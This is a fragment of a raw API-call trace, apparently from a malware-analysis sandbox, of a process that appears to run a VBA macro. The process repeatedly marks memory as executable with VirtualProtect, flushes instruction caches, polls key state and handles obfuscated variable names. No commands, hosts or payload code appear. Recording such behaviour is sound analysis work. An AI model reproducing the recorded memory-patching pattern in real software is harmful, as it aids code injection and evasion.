0xffffffff [0112.193] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0112.193] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.194] GetCurrentProcess () returned 0xffffffff [0112.194] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0112.194] GetCurrentProcess () returned 0xffffffff [0112.194] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0112.194] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.194] GetCurrentProcess () returned 0xffffffff [0112.194] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0112.194] GetCurrentProcess () returned 0xffffffff [0112.194] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0112.194] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.195] GetCurrentProcess () returned 0xffffffff [0112.195] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0112.196] GetAsyncKeyState (vKey=3) returned 0 [0112.196] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.196] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.196] CRetailMalloc_Alloc () returned 0xcc1b128 [0112.196] memcpy (in: _Dst=0xd015168, _Src=0x19759c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.196] memcpy (in: _Dst=0xd01516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.196] memcpy (in: _Dst=0xd01516c, _Src=0x1973d4, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.196] memcpy (in: _Dst=0xd01516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.197] memcpy (in: _Dst=0xd015170, _Src=0x19759c, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0112.197] memcpy (in: _Dst=0xd01516c, _Src=0x197548, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302de6, cbMultiByte=15, lpWideCharStr=0x197348, cchWideChar=16 | out: lpWideCharStr="—––————–––—–——") returned 15 [0112.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c05a2, cbMultiByte=15, lpWideCharStr=0x1973a8, cchWideChar=16 | out: lpWideCharStr="—––————–––—–——") returned 15 [0112.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c05a2, cbMultiByte=15, lpWideCharStr=0x1973a8, cchWideChar=16 | out: lpWideCharStr="—––————–––—–——") returned 15 [0112.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c05a2, cbMultiByte=15, lpWideCharStr=0x1973a8, cchWideChar=16 | out: lpWideCharStr="—––————–––—–——") returned 15 [0112.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c05a2, cbMultiByte=15, lpWideCharStr=0x1973a8, cchWideChar=16 | out: lpWideCharStr="—––————–––—–——") returned 15 [0112.198] CRetailMalloc_Alloc () returned 0xc872b80 [0112.198] _mbscpy_s (in: _Dst=0xc872b80, _DstSizeInBytes=0xf, _Src=0x112c05a2 | out: _Dst=0xc872b80) returned 0x0 [0112.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0b32, cbMultiByte=22, lpWideCharStr=0x1973b8, cchWideChar=23 | out: lpWideCharStr="_B_var_—––————–––—–——") returned 22 [0112.198] CRetailMalloc_Free () returned 0x1 [0112.199] _mbscpy_s (in: _Dst=0x1974d0, _DstSizeInBytes=0xa, _Src=0x112c0636 | out: _Dst=0x1974d0) returned 0x0 [0112.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb1a43e0, cbMultiByte=12, lpWideCharStr=0x11460c9c, cchWideChar=26 | out: lpWideCharStr="kTlu2chDwOPK") returned 12 [0112.199] memcpy (in: _Dst=0xcb3cf80, _Src=0x11460c98, _Size=0x1e | out: _Dst=0xcb3cf80) returned 0xcb3cf80 [0112.199] memcpy (in: _Dst=0xd015168, _Src=0x19759c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.199] memcpy (in: _Dst=0xd015168, _Src=0x197568, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb1a43f6, cbMultiByte=12, lpWideCharStr=0x11461056, cchWideChar=26 | out: lpWideCharStr="zCjkcydUhHLp") returned 12 [0112.199] memcpy (in: _Dst=0xcb3cfa4, _Src=0x11461052, _Size=0x1e | out: _Dst=0xcb3cfa4) returned 0xcb3cfa4 [0112.199] memcpy (in: _Dst=0xd01516c, _Src=0x19759c, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.199] memcpy (in: _Dst=0xd01516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.199] memcpy (in: _Dst=0xd015168, _Src=0x197548, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.199] memcpy (in: _Dst=0xd015168, _Src=0x197568, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.199] memcpy (in: _Dst=0xd01516c, _Src=0x19759c, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.199] memcpy (in: _Dst=0xd015170, _Src=0x197568, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0112.199] memcpy (in: _Dst=0xd015170, _Src=0x1973d4, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0112.199] memcpy (in: _Dst=0xd015170, _Src=0x197568, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0112.199] memcpy (in: _Dst=0xd015174, _Src=0x19759c, _Size=0x4 | out: _Dst=0xd015174) returned 0xd015174 [0112.199] memcpy (in: _Dst=0xd015170, _Src=0x197548, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0112.199] memcpy (in: _Dst=0xd015174, _Src=0x19759c, _Size=0x4 | out: _Dst=0xd015174) returned 0xd015174 [0112.200] memcpy (in: _Dst=0xd015270, _Src=0x19754c, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0112.200] memcpy (in: _Dst=0xd015168, _Src=0x197568, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.200] memcpy (in: _Dst=0xd01516c, _Src=0x19759c, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.200] memcpy (in: _Dst=0xd015168, _Src=0x197548, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.200] memcpy (in: _Dst=0xd015168, _Src=0x19759c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.200] memcpy (in: _Dst=0xd01516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.200] memcpy (in: _Dst=0xd015170, _Src=0x197568, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0112.200] memcpy (in: _Dst=0xd015174, _Src=0x197568, _Size=0x4 | out: _Dst=0xd015174) returned 0xd015174 [0112.200] memcpy (in: _Dst=0xd015170, _Src=0x197568, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0112.200] memcpy (in: _Dst=0xd01516c, _Src=0x197548, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.200] memcpy (in: _Dst=0xd015170, _Src=0x197568, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0112.200] memcpy (in: _Dst=0xd015174, _Src=0x197568, _Size=0x4 | out: _Dst=0xd015174) returned 0xd015174 [0112.200] memcpy (in: _Dst=0xd015178, _Src=0x19759c, _Size=0x4 | out: _Dst=0xd015178) returned 0xd015178 [0112.200] memcpy (in: _Dst=0xd015174, _Src=0x197548, _Size=0x4 | out: _Dst=0xd015174) returned 0xd015174 [0112.200] memcpy (in: _Dst=0xd015170, _Src=0x197568, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0112.200] memcpy (in: _Dst=0xd01516c, _Src=0x197548, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.200] memcpy (in: _Dst=0xd01516c, _Src=0x1973d4, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.200] memcpy (in: _Dst=0xd01516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.200] memcpy (in: _Dst=0xd015168, _Src=0x197548, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.200] memcpy (in: _Dst=0xd01516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.200] memcpy (in: _Dst=0xd015168, _Src=0x197568, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.201] memcpy (in: _Dst=0xcc1b1ef, _Src=0x1974fc, _Size=0x1 | out: _Dst=0xcc1b1ef) returned 0xcc1b1ef [0112.201] memcpy (in: _Dst=0xcc1b288, _Src=0x197604, _Size=0x18 | out: _Dst=0xcc1b288) returned 0xcc1b288 [0112.201] CRetailMalloc_Realloc () returned 0xcc1b128 [0112.201] CRetailMalloc_Free () returned 0x1 [0112.201] GetCurrentProcess () returned 0xffffffff [0112.201] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0112.201] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.202] GetCurrentProcess () returned 0xffffffff [0112.202] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0112.202] GetCurrentProcess () returned 0xffffffff [0112.202] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0112.202] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.233] GetCurrentProcess () returned 0xffffffff [0112.233] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0112.233] GetCurrentProcess () returned 0xffffffff [0112.233] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0112.233] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.234] GetCurrentProcess () returned 0xffffffff [0112.234] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0112.234] GetCurrentProcess () returned 0xffffffff [0112.234] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0112.234] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.235] GetCurrentProcess () returned 0xffffffff [0112.235] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0112.235] GetCurrentProcess () returned 0xffffffff [0112.235] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0112.235] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.237] GetCurrentProcess () returned 0xffffffff [0112.237] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0112.237] GetCurrentProcess () returned 0xffffffff [0112.237] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0112.237] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.238] GetCurrentProcess () returned 0xffffffff [0112.238] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0112.238] GetCurrentProcess () returned 0xffffffff [0112.238] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0112.238] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.238] GetCurrentProcess () returned 0xffffffff [0112.238] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0112.238] GetCurrentProcess () returned 0xffffffff [0112.238] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0112.238] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.239] GetCurrentProcess () returned 0xffffffff [0112.239] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0112.239] GetCurrentProcess () returned 0xffffffff [0112.239] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0112.239] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.239] GetCurrentProcess () returned 0xffffffff [0112.239] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0112.240] GetCurrentProcess () returned 0xffffffff [0112.240] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0112.240] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.240] GetCurrentProcess () returned 0xffffffff [0112.240] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0112.240] GetCurrentProcess () returned 0xffffffff [0112.240] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0112.240] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.241] GetCurrentProcess () returned 0xffffffff [0112.241] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0112.241] GetCurrentProcess () returned 0xffffffff [0112.241] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0112.241] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.241] GetCurrentProcess () returned 0xffffffff [0112.241] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0112.241] GetCurrentProcess () returned 0xffffffff [0112.241] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0112.241] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.242] GetCurrentProcess () returned 0xffffffff [0112.242] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0112.242] GetCurrentProcess () returned 0xffffffff [0112.242] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0112.242] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.243] GetCurrentProcess () returned 0xffffffff [0112.243] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0112.243] GetCurrentProcess () returned 0xffffffff [0112.243] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0112.243] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.243] GetCurrentProcess () returned 0xffffffff [0112.243] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0112.243] GetCurrentProcess () returned 0xffffffff [0112.243] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0112.243] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.244] GetCurrentProcess () returned 0xffffffff [0112.244] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0112.244] GetCurrentProcess () returned 0xffffffff [0112.244] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0112.244] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.244] GetCurrentProcess () returned 0xffffffff [0112.245] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0112.245] GetCurrentProcess () returned 0xffffffff [0112.245] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0112.245] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.245] GetCurrentProcess () returned 0xffffffff [0112.245] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0112.245] GetCurrentProcess () returned 0xffffffff [0112.245] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0112.245] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.246] GetCurrentProcess () returned 0xffffffff [0112.246] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0112.246] GetCurrentProcess () returned 0xffffffff [0112.246] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0112.246] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.246] GetCurrentProcess () returned 0xffffffff [0112.246] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0112.246] GetCurrentProcess () returned 0xffffffff [0112.246] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0112.247] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.247] GetCurrentProcess () returned 0xffffffff [0112.247] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0112.247] GetCurrentProcess () returned 0xffffffff [0112.247] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0112.247] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.248] GetCurrentProcess () returned 0xffffffff [0112.248] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0112.248] GetCurrentProcess () returned 0xffffffff [0112.248] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0112.248] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.248] GetCurrentProcess () returned 0xffffffff [0112.248] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0112.248] GetCurrentProcess () returned 0xffffffff [0112.248] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0112.248] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.249] GetCurrentProcess () returned 0xffffffff [0112.249] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0112.249] GetCurrentProcess () returned 0xffffffff [0112.249] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0112.249] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.249] GetCurrentProcess () returned 0xffffffff [0112.249] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0112.249] GetCurrentProcess () returned 0xffffffff [0112.249] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0112.249] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.250] GetCurrentProcess () returned 0xffffffff [0112.250] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0112.250] GetCurrentProcess () returned 0xffffffff [0112.250] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0112.250] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.251] GetCurrentProcess () returned 0xffffffff [0112.251] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0112.251] GetCurrentProcess () returned 0xffffffff [0112.251] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0112.251] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.252] GetCurrentProcess () returned 0xffffffff [0112.252] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0112.252] GetCurrentProcess () returned 0xffffffff [0112.252] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0112.252] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.252] GetCurrentProcess () returned 0xffffffff [0112.252] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0112.252] GetCurrentProcess () returned 0xffffffff [0112.252] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0112.252] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.253] GetCurrentProcess () returned 0xffffffff [0112.253] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0112.253] GetCurrentProcess () returned 0xffffffff [0112.253] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0112.253] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0112.254] GetCurrentProcess () returned 0xffffffff [0112.254] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0112.255] GetAsyncKeyState (vKey=3) returned 0 [0112.255] CRetailMalloc_Alloc () returned 0xcb7aa88 [0112.255] memcpy (in: _Dst=0xd015168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.255] memcpy (in: _Dst=0xd015270, _Src=0x197404, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0112.255] memcpy (in: _Dst=0xd015168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.255] memcpy (in: _Dst=0xd015168, _Src=0x1973bc, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302e12, cbMultiByte=16, lpWideCharStr=0x197204, cchWideChar=17 | out: lpWideCharStr="—–––————––——–—–") returned 16 [0112.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c016e, cbMultiByte=16, lpWideCharStr=0x197264, cchWideChar=17 | out: lpWideCharStr="—–––————––——–—–") returned 16 [0112.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c016e, cbMultiByte=16, lpWideCharStr=0x197264, cchWideChar=17 | out: lpWideCharStr="—–––————––——–—–") returned 16 [0112.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c016e, cbMultiByte=16, lpWideCharStr=0x197264, cchWideChar=17 | out: lpWideCharStr="—–––————––——–—–") returned 16 [0112.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c016e, cbMultiByte=16, lpWideCharStr=0x197264, cchWideChar=17 | out: lpWideCharStr="—–––————––——–—–") returned 16 [0112.256] CRetailMalloc_Alloc () returned 0xc872b80 [0112.256] _mbscpy_s (in: _Dst=0xc872b80, _DstSizeInBytes=0x10, _Src=0x112c016e | out: _Dst=0xc872b80) returned 0x0 [0112.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0b66, cbMultiByte=23, lpWideCharStr=0x197274, cchWideChar=24 | out: lpWideCharStr="_B_var_—–––————––——–—–") returned 23 [0112.257] _mbscpy_s (in: _Dst=0x1972dc, _DstSizeInBytes=0x10, _Src=0x112c016e | out: _Dst=0x1972dc) returned 0x0 [0112.257] CRetailMalloc_Free () returned 0x1 [0112.257] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0112.257] memcpy (in: _Dst=0xd015168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.257] memcpy (in: _Dst=0xd01516c, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.257] memcpy (in: _Dst=0xd015168, _Src=0x197254, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.257] memcpy (in: _Dst=0xd015168, _Src=0x197254, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.257] memcpy (in: _Dst=0xd015168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.257] memcpy (in: _Dst=0xd015168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.257] memcpy (in: _Dst=0xcb7aafc, _Src=0x197484, _Size=0x18 | out: _Dst=0xcb7aafc) returned 0xcb7aafc [0112.257] CRetailMalloc_Realloc () returned 0xcb7aa88 [0112.257] CRetailMalloc_Free () returned 0x1 [0112.257] GetCurrentProcess () returned 0xffffffff 